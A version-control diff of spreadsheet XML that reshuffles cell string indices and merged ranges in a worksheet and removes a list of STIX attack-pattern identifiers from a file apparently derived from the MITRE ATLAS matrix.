+        <v>340</v>
+      </c>
+      <c r="M3" s="3" t="s">
+        <v>319</v>
+      </c>
+      <c r="O3" t="s">
+        <v>366</v>
+      </c>
+      <c r="P3" s="6" t="s">
+        <v>305</v>
+      </c>
+      <c r="Q3" s="4" t="s">
+        <v>281</v>
+      </c>
+      <c r="R3" s="6" t="s">
+        <v>298</v>
+      </c>
+      <c r="S3" s="4" t="s">
+        <v>271</v>
+      </c>
+      <c r="T3" s="6"/>
+      <c r="U3" s="4" t="s">
+        <v>286</v>
+      </c>
+      <c r="W3" s="6" t="s">
+        <v>321</v>
+      </c>
+      <c r="X3" s="4" t="s">
+        <v>325</v>
+      </c>
+      <c r="Y3" s="3" t="s">
         <v>302</v>
       </c>
-      <c r="J3" s="6" t="s">
-        <v>310</v>
-      </c>
-      <c r="K3" s="4" t="s">
-        <v>315</v>
-      </c>
-      <c r="L3" t="s">
-        <v>302</v>
-      </c>
-      <c r="M3" s="3" t="s">
-        <v>281</v>
-      </c>
-      <c r="P3" s="3" t="s">
-        <v>269</v>
-      </c>
-      <c r="R3" t="s">
-        <v>263</v>
-      </c>
-      <c r="S3" s="6"/>
-      <c r="T3" s="4" t="s">
-        <v>252</v>
-      </c>
-      <c r="V3" s="6"/>
-      <c r="W3" s="4" t="s">
-        <v>296</v>
-      </c>
-      <c r="X3" s="3" t="s">
-        <v>266</v>
-      </c>
-    </row>
-    <row r="4" spans="1:25">
+    </row>
+    <row r="4" spans="1:26">
       <c r="A4" s="3" t="s">
-        <v>330</v>
+        <v>372</v>
       </c>
       <c r="C4" s="6" t="s">
-        <v>247</v>
+        <v>280</v>
       </c>
       <c r="D4" s="4" t="s">
-        <v>265</v>
+        <v>301</v>
       </c>
       <c r="E4" s="6"/>
       <c r="F4" s="4" t="s">
-        <v>293</v>
+        <v>332</v>
       </c>
       <c r="G4" t="s">
-        <v>290</v>
+        <v>329</v>
       </c>
       <c r="H4" s="6" t="s">
+        <v>342</v>
+      </c>
+      <c r="I4" s="4" t="s">
         <v>304</v>
       </c>
-      <c r="I4" s="4" t="s">
-        <v>268</v>
-      </c>
-      <c r="J4" s="6"/>
-      <c r="K4" s="4" t="s">
-        <v>320</v>
+      <c r="J4" s="3" t="s">
+        <v>344</v>
       </c>
       <c r="M4" s="6" t="s">
-        <v>288</v>
+        <v>327</v>
       </c>
       <c r="N4" s="4" t="s">
-        <v>253</v>
-      </c>
-      <c r="P4" s="3" t="s">
-        <v>270</v>
-      </c>
-      <c r="R4" t="s">
-        <v>264</v>
-      </c>
-      <c r="S4" s="6"/>
-      <c r="T4" s="4" t="s">
-        <v>297</v>
-      </c>
-      <c r="V4" s="6"/>
-      <c r="W4" s="4" t="s">
-        <v>298</v>
-      </c>
-      <c r="X4" s="3" t="s">
-        <v>278</v>
-      </c>
-    </row>
-    <row r="5" spans="1:25">
+        <v>287</v>
+      </c>
+      <c r="O4" t="s">
+        <v>392</v>
+      </c>
+      <c r="P4" s="6"/>
+      <c r="Q4" s="4" t="s">
+        <v>315</v>
+      </c>
+      <c r="R4" s="6"/>
+      <c r="S4" s="4" t="s">
+        <v>367</v>
+      </c>
+      <c r="T4" s="6"/>
+      <c r="U4" s="4" t="s">
+        <v>336</v>
+      </c>
+      <c r="W4" s="6"/>
+      <c r="X4" s="4" t="s">
+        <v>335</v>
+      </c>
+      <c r="Y4" s="3" t="s">
+        <v>316</v>
+      </c>
+    </row>
+    <row r="5" spans="1:26">
       <c r="A5" s="3" t="s">
-        <v>331</v>
+        <v>373</v>
       </c>
       <c r="C5" s="6"/>
       <c r="D5" s="4" t="s">
-        <v>314</v>
+        <v>353</v>
       </c>
       <c r="E5" s="6"/>
       <c r="F5" s="4" t="s">
-        <v>313</v>
+        <v>352</v>
       </c>
       <c r="G5" t="s">
-        <v>319</v>
+        <v>359</v>
       </c>
       <c r="H5" s="6"/>
       <c r="I5" s="4" t="s">
-        <v>295</v>
-      </c>
-      <c r="J5" s="3" t="s">
-        <v>321</v>
+        <v>334</v>
+      </c>
+      <c r="J5" s="6" t="s">
+        <v>348</v>
+      </c>
+      <c r="K5" s="4" t="s">
+        <v>355</v>
       </c>
       <c r="M5" s="6"/>
       <c r="N5" s="4" t="s">
-        <v>257</v>
-      </c>
-      <c r="P5" s="3" t="s">
-        <v>271</v>
-      </c>
-      <c r="S5" s="6"/>
-      <c r="T5" s="4" t="s">
-        <v>311</v>
-      </c>
-      <c r="V5" s="3" t="s">
-        <v>283</v>
-      </c>
-      <c r="X5" s="3" t="s">
-        <v>279</v>
-      </c>
-      <c r="Y5" s="4" t="s">
-        <v>309</v>
-      </c>
-    </row>
-    <row r="6" spans="1:25">
+        <v>291</v>
+      </c>
+      <c r="P5" s="6"/>
+      <c r="Q5" s="4" t="s">
+        <v>387</v>
+      </c>
+      <c r="R5" s="3" t="s">
+        <v>299</v>
+      </c>
+      <c r="T5" s="6"/>
+      <c r="U5" s="4" t="s">
+        <v>349</v>
+      </c>
+      <c r="W5" s="6"/>
+      <c r="X5" s="4" t="s">
+        <v>337</v>
+      </c>
+      <c r="Y5" s="3" t="s">
+        <v>317</v>
+      </c>
+      <c r="Z5" s="4" t="s">
+        <v>347</v>
+      </c>
+    </row>
+    <row r="6" spans="1:26">
       <c r="A6" s="6" t="s">
-        <v>332</v>
+        <v>374</v>
       </c>
       <c r="B6" s="4" t="s">
-        <v>299</v>
+        <v>338</v>
       </c>
       <c r="C6" s="3" t="s">
-        <v>267</v>
+        <v>303</v>
       </c>
       <c r="D6" s="4" t="s">
-        <v>250</v>
+        <v>284</v>
       </c>
       <c r="E6" s="3" t="s">
-        <v>276</v>
+        <v>313</v>
       </c>
       <c r="H6" s="3" t="s">
-        <v>349</v>
+        <v>394</v>
       </c>
       <c r="I6" s="4" t="s">
-        <v>346</v>
-      </c>
-      <c r="J6" s="3" t="s">
-        <v>326</v>
+        <v>391</v>
+      </c>
+      <c r="J6" s="6"/>
+      <c r="K6" s="4" t="s">
+        <v>360</v>
       </c>
       <c r="M6" s="6"/>
       <c r="N6" s="4" t="s">
-        <v>277</v>
+        <v>314</v>
       </c>
       <c r="P6" s="3" t="s">
-        <v>272</v>
-      </c>
-      <c r="Q6" s="4" t="s">
-        <v>292</v>
-      </c>
-      <c r="S6" s="6"/>
-      <c r="T6" s="4" t="s">
-        <v>353</v>
-      </c>
-      <c r="V6" s="3" t="s">
-        <v>287</v>
-      </c>
-      <c r="X6" s="3" t="s">
-        <v>281</v>
-      </c>
-    </row>
-    <row r="7" spans="1:25">
+        <v>306</v>
+      </c>
+      <c r="R6" s="3" t="s">
+        <v>300</v>
+      </c>
+      <c r="T6" s="6"/>
+      <c r="U6" s="4" t="s">
+        <v>398</v>
+      </c>
+      <c r="W6" s="3" t="s">
+        <v>322</v>
+      </c>
+      <c r="Y6" s="3" t="s">
+        <v>319</v>
+      </c>
+    </row>
+    <row r="7" spans="1:26">
       <c r="A7" s="6"/>
       <c r="B7" s="4" t="s">
-        <v>322</v>
+        <v>362</v>
       </c>
       <c r="C7" s="3" t="s">
-        <v>280</v>
+        <v>318</v>
       </c>
       <c r="E7" s="3" t="s">
-        <v>281</v>
+        <v>319</v>
+      </c>
+      <c r="J7" s="3" t="s">
+        <v>354</v>
       </c>
       <c r="M7" s="3" t="s">
-        <v>294</v>
-      </c>
-      <c r="P7" s="6" t="s">
-        <v>273</v>
-      </c>
-      <c r="Q7" s="4" t="s">
-        <v>275</v>
-      </c>
-      <c r="S7" s="6" t="s">
-        <v>261</v>
-      </c>
-      <c r="T7" s="4" t="s">
-        <v>344</v>
-      </c>
-      <c r="V7" s="3" t="s">
-        <v>300</v>
-      </c>
-      <c r="X7" s="6" t="s">
-        <v>285</v>
-      </c>
-      <c r="Y7" s="4" t="s">
-        <v>241</v>
-      </c>
-    </row>
-    <row r="8" spans="1:25">
+        <v>333</v>
+      </c>
+      <c r="P7" s="3" t="s">
+        <v>307</v>
+      </c>
+      <c r="T7" s="6" t="s">
+        <v>295</v>
+      </c>
+      <c r="U7" s="4" t="s">
+        <v>388</v>
+      </c>
+      <c r="W7" s="3" t="s">
+        <v>326</v>
+      </c>
+      <c r="Y7" s="6" t="s">
+        <v>324</v>
+      </c>
+      <c r="Z7" s="4" t="s">
+        <v>274</v>
+      </c>
+    </row>
+    <row r="8" spans="1:26">
       <c r="A8" s="6"/>
       <c r="B8" s="4" t="s">
+        <v>385</v>
+      </c>
+      <c r="C8" s="3" t="s">
+        <v>341</v>
+      </c>
+      <c r="E8" s="3" t="s">
+        <v>323</v>
+      </c>
+      <c r="J8" s="3" t="s">
+        <v>361</v>
+      </c>
+      <c r="M8" s="3" t="s">
+        <v>340</v>
+      </c>
+      <c r="P8" s="3" t="s">
+        <v>308</v>
+      </c>
+      <c r="T8" s="6"/>
+      <c r="U8" s="4" t="s">
+        <v>389</v>
+      </c>
+      <c r="W8" s="3" t="s">
+        <v>339</v>
+      </c>
+      <c r="Y8" s="6"/>
+      <c r="Z8" s="4" t="s">
+        <v>328</v>
+      </c>
+    </row>
+    <row r="9" spans="1:26">
+      <c r="A9" s="3" t="s">
+        <v>375</v>
+      </c>
+      <c r="C9" s="6" t="s">
+        <v>356</v>
+      </c>
+      <c r="D9" s="4" t="s">
+        <v>283</v>
+      </c>
+      <c r="E9" s="3" t="s">
+        <v>357</v>
+      </c>
+      <c r="F9" s="4" t="s">
+        <v>380</v>
+      </c>
+      <c r="J9" s="3" t="s">
+        <v>368</v>
+      </c>
+      <c r="M9" s="3" t="s">
         <v>343</v>
       </c>
-      <c r="C8" s="3" t="s">
-        <v>303</v>
-      </c>
-      <c r="E8" s="3" t="s">
-        <v>284</v>
-      </c>
-      <c r="M8" s="3" t="s">
-        <v>301</v>
-      </c>
-      <c r="P8" s="6"/>
-      <c r="Q8" s="4" t="s">
-        <v>318</v>
-      </c>
-      <c r="S8" s="6"/>
-      <c r="T8" s="4" t="s">
+      <c r="P9" s="3" t="s">
+        <v>309</v>
+      </c>
+      <c r="Q9" s="4" t="s">
+        <v>331</v>
+      </c>
+      <c r="T9" s="6"/>
+      <c r="U9" s="4" t="s">
+        <v>393</v>
+      </c>
+      <c r="W9" s="3" t="s">
         <v>345</v>
       </c>
-      <c r="V8" s="3" t="s">
-        <v>307</v>
-      </c>
-      <c r="W8" s="4" t="s">
-        <v>334</v>
-      </c>
-      <c r="X8" s="6"/>
-      <c r="Y8" s="4" t="s">
-        <v>289</v>
-      </c>
-    </row>
-    <row r="9" spans="1:25">
-      <c r="A9" s="3" t="s">
-        <v>333</v>
-      </c>
-      <c r="C9" s="6" t="s">
-        <v>316</v>
-      </c>
-      <c r="D9" s="4" t="s">
-        <v>249</v>
-      </c>
-      <c r="E9" s="3" t="s">
-        <v>317</v>
-      </c>
-      <c r="F9" s="4" t="s">
-        <v>338</v>
-      </c>
-      <c r="M9" s="3" t="s">
-        <v>305</v>
-      </c>
-      <c r="P9" s="6" t="s">
-        <v>274</v>
-      </c>
-      <c r="Q9" s="4" t="s">
-        <v>339</v>
-      </c>
-      <c r="S9" s="6"/>
-      <c r="T9" s="4" t="s">
-        <v>348</v>
-      </c>
-      <c r="X9" s="6"/>
-      <c r="Y9" s="4" t="s">
-        <v>327</v>
-      </c>
-    </row>
-    <row r="10" spans="1:25">
+      <c r="X9" s="4" t="s">
+        <v>376</v>
+      </c>
+      <c r="Y9" s="6"/>
+      <c r="Z9" s="4" t="s">
+        <v>369</v>
+      </c>
+    </row>
+    <row r="10" spans="1:26">
       <c r="C10" s="6"/>
       <c r="D10" s="4" t="s">
-        <v>336</v>
+        <v>378</v>
       </c>
       <c r="E10" s="3" t="s">
-        <v>351</v>
+        <v>396</v>
       </c>
       <c r="M10" s="3" t="s">
-        <v>308</v>
-      </c>
-      <c r="P10" s="6"/>
+        <v>346</v>
+      </c>
+      <c r="P10" s="6" t="s">
+        <v>310</v>
+      </c>
       <c r="Q10" s="4" t="s">
-        <v>341</v>
-      </c>
-      <c r="S10" s="6" t="s">
-        <v>310</v>
-      </c>
-      <c r="T10" s="4" t="s">
-        <v>315</v>
-      </c>
-      <c r="X10" s="6"/>
-      <c r="Y10" s="4" t="s">
-        <v>335</v>
-      </c>
-    </row>
-    <row r="11" spans="1:25">
+        <v>312</v>
+      </c>
+      <c r="T10" s="6" t="s">
+        <v>348</v>
+      </c>
+      <c r="U10" s="4" t="s">
+        <v>355</v>
+      </c>
+      <c r="Y10" s="6"/>
+      <c r="Z10" s="4" t="s">
+        <v>377</v>
+      </c>
+    </row>
+    <row r="11" spans="1:26">
       <c r="C11" s="3" t="s">
-        <v>321</v>
+        <v>361</v>
       </c>
       <c r="M11" s="3" t="s">
-        <v>312</v>
+        <v>350</v>
       </c>
       <c r="P11" s="6"/>
       <c r="Q11" s="4" t="s">
-        <v>342</v>
-      </c>
-      <c r="S11" s="6"/>
-      <c r="T11" s="4" t="s">
-        <v>320</v>
-      </c>
-      <c r="X11" s="6"/>
-      <c r="Y11" s="4" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="12" spans="1:25">
+        <v>358</v>
+      </c>
+      <c r="T11" s="6"/>
+      <c r="U11" s="4" t="s">
+        <v>360</v>
+      </c>
+      <c r="Y11" s="6"/>
+      <c r="Z11" s="4" t="s">
+        <v>395</v>
+      </c>
+    </row>
+    <row r="12" spans="1:26">
       <c r="C12" s="3" t="s">
-        <v>323</v>
-      </c>
-      <c r="S12" s="3" t="s">
-        <v>352</v>
-      </c>
-      <c r="X12" s="3" t="s">
-        <v>337</v>
-      </c>
-    </row>
-    <row r="13" spans="1:25">
+        <v>363</v>
+      </c>
+      <c r="P12" s="6" t="s">
+        <v>311</v>
+      </c>
+      <c r="Q12" s="4" t="s">
+        <v>381</v>
+      </c>
+      <c r="T12" s="3" t="s">
+        <v>397</v>
+      </c>
+      <c r="Y12" s="3" t="s">
+        <v>379</v>
+      </c>
+    </row>
+    <row r="13" spans="1:26">
       <c r="C13" s="3" t="s">
-        <v>324</v>
-      </c>
-    </row>
-    <row r="14" spans="1:25">
+        <v>364</v>
+      </c>
+      <c r="P13" s="6"/>
+      <c r="Q13" s="4" t="s">
+        <v>383</v>
+      </c>
+    </row>
+    <row r="14" spans="1:26">
       <c r="C14" s="3" t="s">
-        <v>325</v>
-      </c>
-    </row>
-    <row r="15" spans="1:25">
+        <v>365</v>
+      </c>
+      <c r="P14" s="6"/>
+      <c r="Q14" s="4" t="s">
+        <v>384</v>
+      </c>
+    </row>
+    <row r="15" spans="1:26">
       <c r="C15" s="3" t="s">
-        <v>328</v>
-      </c>
-    </row>
-    <row r="16" spans="1:25">
+        <v>370</v>
+      </c>
+    </row>
+    <row r="16" spans="1:26">
       <c r="C16" s="3" t="s">
-        <v>340</v>
+        <v>382</v>
       </c>
     </row>
   </sheetData>
-  <mergeCells count="25">
+  <mergeCells count="29">
     <mergeCell ref="A6:A8"/>
     <mergeCell ref="A1:B1"/>
     <mergeCell ref="C2:C3"/>
@@ -8246,21 +8979,25 @@
     <mergeCell ref="E1:F1"/>
     <mergeCell ref="H4:H5"/>
     <mergeCell ref="H1:I1"/>
-    <mergeCell ref="J3:J4"/>
+    <mergeCell ref="J2:J3"/>
+    <mergeCell ref="J5:J6"/>
     <mergeCell ref="J1:K1"/>
     <mergeCell ref="M4:M6"/>
     <mergeCell ref="M1:N1"/>
-    <mergeCell ref="P7:P8"/>
-    <mergeCell ref="P9:P11"/>
+    <mergeCell ref="P3:P5"/>
+    <mergeCell ref="P10:P11"/>
+    <mergeCell ref="P12:P14"/>
     <mergeCell ref="P1:Q1"/>
-    <mergeCell ref="S2:S6"/>
-    <mergeCell ref="S7:S9"/>
-    <mergeCell ref="S10:S11"/>
-    <mergeCell ref="S1:T1"/>
-    <mergeCell ref="V2:V4"/>
-    <mergeCell ref="V1:W1"/>
-    <mergeCell ref="X7:X11"/>
-    <mergeCell ref="X1:Y1"/>
+    <mergeCell ref="R3:R4"/>
+    <mergeCell ref="R1:S1"/>
+    <mergeCell ref="T2:T6"/>
+    <mergeCell ref="T7:T9"/>
+    <mergeCell ref="T10:T11"/>
+    <mergeCell ref="T1:U1"/>
+    <mergeCell ref="W3:W5"/>
+    <mergeCell ref="W1:X1"/>
+    <mergeCell ref="Y7:Y11"/>
+    <mergeCell ref="Y1:Z1"/>
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -436,394 +436,394 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--b218b168-e3d3-4582-bf1b-15d337ca1a81</t>
-  </si>
-  <si>
-    <t>attack-pattern--13ee69c8-da80-4724-a9d1-ecca9fdf9329</t>
-  </si>
-  <si>
-    <t>attack-pattern--3947e853-aae2-43ca-8e07-1842eb3a7861</t>
-  </si>
-  <si>
-    <t>attack-pattern--0303efbf-15e3-4236-b772-141d8a8a957d</t>
-  </si>
-  <si>
-    <t>attack-pattern--eae927c9-ae38-437c-8f1f-338eece6ac58</t>
-  </si>
-  <si>
-    <t>attack-pattern--c07b4911-2be0-427c-9334-c76f3947bd7d</t>
-  </si>
-  <si>
-    <t>attack-pattern--bf14e573-22d9-4468-9356-79f9191487fc</t>
-  </si>
-  <si>
-    <t>attack-pattern--63d80df5-c87c-424d-98bb-43792372b830</t>
-  </si>
-  <si>
-    <t>attack-pattern--b64aca28-b194-4e49-8879-942f679f64df</t>
-  </si>
-  <si>
-    <t>attack-pattern--ac579bcf-77d6-4ea4-8349-93eb05a5f405</t>
-  </si>
-  <si>
-    <t>attack-pattern--9a0f538c-4f1e-46ad-b06d-df735ce58335</t>
-  </si>
-  <si>
-    <t>attack-pattern--9da7e4e5-08e4-483f-a180-091e6a8bc388</t>
-  </si>
-  <si>
-    <t>attack-pattern--5d2730c6-9ddc-49c3-ae0c-17375997c920</t>
-  </si>
-  <si>
-    <t>attack-pattern--f0e2dee4-6dce-4282-8006-b2bbb394957f</t>
-  </si>
-  <si>
-    <t>attack-pattern--7d8cd3ac-5626-4dab-b3d7-7103ac11fb7e</t>
-  </si>
-  <si>
-    <t>attack-pattern--b7357acb-4af2-49d6-b793-2749c5a51d74</t>
-  </si>
-  <si>
-    <t>attack-pattern--c1ecb552-faa2-40d8-8b39-8fc7d21c4777</t>
-  </si>
-  <si>
-    <t>attack-pattern--e9718063-cb79-4a47-a489-1853cd30a19d</t>
-  </si>
-  <si>
-    <t>attack-pattern--49e7ba45-abe2-443d-9fdc-21bc215fc8c2</t>
-  </si>
-  <si>
-    <t>attack-pattern--2adc2fcf-9833-4b58-8b72-0f23c151b027</t>
-  </si>
-  <si>
-    <t>attack-pattern--462f63d3-affe-4159-86ce-af62b24ecb2b</t>
-  </si>
-  <si>
-    <t>attack-pattern--64cef9af-6422-4051-9511-90bcc3830f78</t>
-  </si>
-  <si>
-    <t>attack-pattern--37fa02ea-d6b5-4f6f-967e-e4acc931d9d1</t>
-  </si>
-  <si>
-    <t>attack-pattern--421cce7a-a6c9-4428-ad62-9f2c9a1dcdec</t>
-  </si>
-  <si>
-    <t>attack-pattern--60014399-fdb3-4b68-85a1-6e5ae0248286</t>
-  </si>
-  <si>
-    <t>attack-pattern--f995f734-67be-4598-95d5-5e707910e1fa</t>
-  </si>
-  <si>
-    <t>attack-pattern--644bda14-f7fd-42fc-94d2-9e880db3f5ff</t>
-  </si>
-  <si>
-    <t>attack-pattern--f62908be-535b-4207-b139-4d55d5cc95e5</t>
-  </si>
-  <si>
-    <t>attack-pattern--992f2f8d-278f-4a6c-863c-b11c70810773</t>
-  </si>
-  <si>
-    <t>attack-pattern--c4487497-d751-4a77-9619-bcdde1fccfd3</t>
-  </si>
-  <si>
-    <t>attack-pattern--b11d88b5-a5f4-488f-a103-42c49f4bf8d8</t>
-  </si>
-  <si>
-    <t>attack-pattern--f03ab3d3-b1d9-48e6-9b55-77d0d1cf1101</t>
-  </si>
-  <si>
-    <t>attack-pattern--c1b202de-c21f-4fa9-87c0-17371126caa3</t>
-  </si>
-  <si>
-    <t>attack-pattern--6c776227-c20d-4038-8226-7dd9f474eeb3</t>
-  </si>
-  <si>
-    <t>attack-pattern--198a9289-6edc-484b-b347-f39004e62f9b</t>
-  </si>
-  <si>
-    <t>attack-pattern--dd0d8a61-4897-497d-ba4b-2ef008b4ae9b</t>
-  </si>
-  <si>
-    <t>attack-pattern--d06217a3-8bab-4668-81f3-5516899bbbc3</t>
-  </si>
-  <si>
-    <t>attack-pattern--c6ac2f3b-cb35-4527-a4e5-af2c973f8d83</t>
-  </si>
-  <si>
-    <t>attack-pattern--4c1d603c-e34a-4a55-ac3a-7938391ed50f</t>
-  </si>
-  <si>
-    <t>attack-pattern--14d0547e-5c60-4efb-be3e-2bc3ffc9a5f5</t>
-  </si>
-  <si>
-    <t>attack-pattern--1fba424a-0258-4ee4-bb0f-6ea0470c1389</t>
-  </si>
-  <si>
-    <t>attack-pattern--d42d5756-756e-477e-a20b-36268980d4a4</t>
-  </si>
-  <si>
-    <t>attack-pattern--026d4f1a-bfd7-4f01-8455-2e80cd22eb0f</t>
-  </si>
-  <si>
-    <t>attack-pattern--7e38e6b0-635d-4959-8379-ef145793fdd8</t>
-  </si>
-  <si>
-    <t>attack-pattern--503a3253-3754-4d92-a75b-ec034664763e</t>
-  </si>
-  <si>
-    <t>attack-pattern--be2bcd5a-81a1-4bbf-8685-2415024985db</t>
-  </si>
-  <si>
-    <t>attack-pattern--ee6c39a4-6710-4f2a-b2a9-c3e26c52d462</t>
-  </si>
-  <si>
-    <t>attack-pattern--90842bc1-4bae-4e91-ba40-08b1450ab4ea</t>
-  </si>
-  <si>
-    <t>attack-pattern--fbefa1a4-6676-4c55-9c6b-568dc36517ae</t>
-  </si>
-  <si>
-    <t>attack-pattern--6fc7a8dd-9cc7-4d4e-9e57-af5963f323eb</t>
-  </si>
-  <si>
-    <t>attack-pattern--8df3e434-a1b6-4e92-aca0-2d8b728073f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--8141ba02-0fe1-4635-a328-06e77dc59e45</t>
-  </si>
-  <si>
-    <t>attack-pattern--eceb6948-b30c-4c5d-b9f9-8219bfd61120</t>
-  </si>
-  <si>
-    <t>attack-pattern--64f0bd2a-284b-4f60-a23f-a0647511c675</t>
-  </si>
-  <si>
-    <t>attack-pattern--3459fcfa-e9c0-4d21-967c-9362c97a847b</t>
-  </si>
-  <si>
-    <t>attack-pattern--0cf41cb3-883a-4b05-80df-90fa375dbb9f</t>
-  </si>
-  <si>
-    <t>attack-pattern--d5d86a7f-0cc9-4963-b8b2-8f4fbf8dda91</t>
-  </si>
-  <si>
-    <t>attack-pattern--c557225b-d26b-4692-a62d-3f0d44adacd1</t>
-  </si>
-  <si>
-    <t>attack-pattern--9d8f9836-d167-4d44-8517-3dd1884d6ee6</t>
-  </si>
-  <si>
-    <t>attack-pattern--79867aae-37f6-4e7a-be06-b1e2c87eb40f</t>
-  </si>
-  <si>
-    <t>attack-pattern--9a8bd016-e00c-490e-8c3f-c8622bf58457</t>
-  </si>
-  <si>
-    <t>attack-pattern--c162f260-b846-4095-8a01-15d2be92a85b</t>
-  </si>
-  <si>
-    <t>attack-pattern--a40a1d59-efc2-4f42-8f46-d713faf43dc2</t>
-  </si>
-  <si>
-    <t>attack-pattern--477fb8bb-47a7-453c-8d92-75c5e3897332</t>
-  </si>
-  <si>
-    <t>attack-pattern--378ff9ce-a89f-473b-8e94-010fc810bde5</t>
-  </si>
-  <si>
-    <t>attack-pattern--b9ff7676-0331-495a-a241-3d196fa04c76</t>
-  </si>
-  <si>
-    <t>attack-pattern--dd8c946a-e156-4721-b7b3-57193260a22d</t>
-  </si>
-  <si>
-    <t>attack-pattern--a85fec62-fdd6-47a8-b494-f6da6f2c8835</t>
-  </si>
-  <si>
-    <t>attack-pattern--72bcf68e-5ea9-4f40-a690-b8b952b623b8</t>
-  </si>
-  <si>
-    <t>attack-pattern--bdb6f7f8-01a1-4554-b349-4467e6d0b9af</t>
-  </si>
-  <si>
-    <t>attack-pattern--3c696a14-01cc-433a-b5f7-9c4129a924ed</t>
-  </si>
-  <si>
-    <t>attack-pattern--8fadf730-0543-4674-abd4-730185107b9e</t>
-  </si>
-  <si>
-    <t>attack-pattern--a335fd90-c271-442e-9574-1b9d6f377f0d</t>
-  </si>
-  <si>
-    <t>attack-pattern--01786a2e-ae41-4076-8ce9-5e7b11ef8d6f</t>
-  </si>
-  <si>
-    <t>attack-pattern--23e2b28f-d251-4169-88a4-c79754dbae01</t>
-  </si>
-  <si>
-    <t>attack-pattern--969491f5-40ee-43eb-b3a9-fe8ccabc8716</t>
-  </si>
-  <si>
-    <t>attack-pattern--e246d3f7-2289-4984-8eb3-03e7c6d548a2</t>
-  </si>
-  <si>
-    <t>attack-pattern--5fc25ea8-c3ab-4d3c-91d2-f167d94259f5</t>
-  </si>
-  <si>
-    <t>attack-pattern--c9b655d4-402a-4daa-a543-4d0162a020d9</t>
-  </si>
-  <si>
-    <t>attack-pattern--9195da08-adda-468c-9b31-0010bd742145</t>
-  </si>
-  <si>
-    <t>attack-pattern--51d90acd-cda0-4f30-9dc7-a1d025a342bb</t>
-  </si>
-  <si>
-    <t>attack-pattern--4ae85ed1-1a25-4f91-80fb-0dee8fe48835</t>
-  </si>
-  <si>
-    <t>attack-pattern--442b02a6-a512-4f96-b91d-8c41c10a3d01</t>
-  </si>
-  <si>
-    <t>attack-pattern--2ca400f1-e1f1-4aca-af63-d8899a40fbbc</t>
-  </si>
-  <si>
-    <t>attack-pattern--2d409d2f-6179-4c2e-a3ba-423c456782a8</t>
-  </si>
-  <si>
-    <t>attack-pattern--568dbc7d-eae6-4e21-8b63-b7974bcbe4e4</t>
-  </si>
-  <si>
-    <t>attack-pattern--206e1b6d-0089-41bf-90f7-a688c98d2e76</t>
-  </si>
-  <si>
-    <t>attack-pattern--b111a5e5-0dde-49cb-a638-98677875b483</t>
-  </si>
-  <si>
-    <t>attack-pattern--b48e5e54-4344-4fbe-a193-ecbdb1a0fce6</t>
-  </si>
-  <si>
-    <t>attack-pattern--cfb51915-efbe-4a78-8dbf-9610bc42e317</t>
-  </si>
-  <si>
-    <t>attack-pattern--ea80c588-0f92-452b-bd1e-714248185c42</t>
-  </si>
-  <si>
-    <t>attack-pattern--523aacd9-47b3-47b2-adb3-287d2a16e5af</t>
-  </si>
-  <si>
-    <t>attack-pattern--c231b0b5-73e4-40b2-bf23-5a99f7a8433b</t>
-  </si>
-  <si>
-    <t>attack-pattern--2934972e-3aad-40bb-b7ea-c605fa71e9fa</t>
-  </si>
-  <si>
-    <t>attack-pattern--6ea410ad-0277-49f7-bfe9-fdf7b39124f7</t>
-  </si>
-  <si>
-    <t>attack-pattern--c03c1cc3-0e57-4dcb-94d4-833fe159975a</t>
-  </si>
-  <si>
-    <t>attack-pattern--fbd4dc77-b6a7-409a-bd43-39c62be957e5</t>
-  </si>
-  <si>
-    <t>attack-pattern--bad3b9c2-9945-4ca1-b88e-3e5e6466b52c</t>
-  </si>
-  <si>
-    <t>attack-pattern--ac6052e6-adbb-40ee-90f3-2c3f8a0a6d24</t>
-  </si>
-  <si>
-    <t>attack-pattern--7e44120a-f478-43b6-9456-6359aab9c422</t>
-  </si>
-  <si>
-    <t>attack-pattern--f706cf8f-ab14-40ba-a863-07eff8e1039b</t>
-  </si>
-  <si>
-    <t>attack-pattern--6d510cb9-3cff-40c5-b7fc-9ef89470b112</t>
-  </si>
-  <si>
-    <t>attack-pattern--9e1c6a18-0f63-4e8a-bc77-1297e712c990</t>
-  </si>
-  <si>
-    <t>attack-pattern--012c03a7-02a4-450b-9bcc-085eed2c3133</t>
-  </si>
-  <si>
-    <t>attack-pattern--6cd0c4a1-ff0f-4435-965f-c7b11ca5a3ad</t>
-  </si>
-  <si>
-    <t>attack-pattern--edd8712e-a284-402e-893f-de3a3438aa17</t>
-  </si>
-  <si>
-    <t>attack-pattern--714544ac-a214-4a1d-8423-c55790cf884b</t>
-  </si>
-  <si>
-    <t>attack-pattern--a1c4e706-c952-4c86-86fc-ad047699d852</t>
-  </si>
-  <si>
-    <t>attack-pattern--7945ec46-b955-4d4e-a44f-222a82194f6d</t>
-  </si>
-  <si>
-    <t>attack-pattern--0713bc84-b9d7-4c31-b1fa-bb9c3e1aaa54</t>
-  </si>
-  <si>
-    <t>attack-pattern--f5f8140a-a8c2-4560-a98d-540a876c0c59</t>
-  </si>
-  <si>
-    <t>attack-pattern--80c8f683-043a-4274-bf2d-9b3f323f0651</t>
-  </si>
-  <si>
-    <t>attack-pattern--eac0a7d4-cc76-4dcf-a43f-edc5558d08b7</t>
-  </si>
-  <si>
-    <t>attack-pattern--edebbba0-5afa-4e61-a61b-b4da6c6b0484</t>
-  </si>
-  <si>
-    <t>attack-pattern--6c633b4c-cad7-46de-9933-561b00416895</t>
-  </si>
-  <si>
-    <t>attack-pattern--6ac205d8-78e1-4a6c-b41b-9f9730d59c13</t>
-  </si>
-  <si>
-    <t>attack-pattern--0864b5e6-c8b4-4af7-84c0-923e3a8973f1</t>
-  </si>
-  <si>
-    <t>attack-pattern--e15a2a8f-2318-46f1-b50f-557bb47c20cb</t>
-  </si>
-  <si>
-    <t>attack-pattern--7b8d0fc0-db3d-4d08-b748-8e13eb30a4aa</t>
-  </si>
-  <si>
-    <t>attack-pattern--1d50c938-8c28-4505-9b8a-a715a3c1b33e</t>
-  </si>
-  <si>
-    <t>attack-pattern--8d87dff5-d7ed-46d2-be6e-1a917d1a7f9b</t>
-  </si>
-  <si>
-    <t>attack-pattern--846ce442-cedd-4b92-85d2-00e2f634ecf2</t>
-  </si>
-  <si>
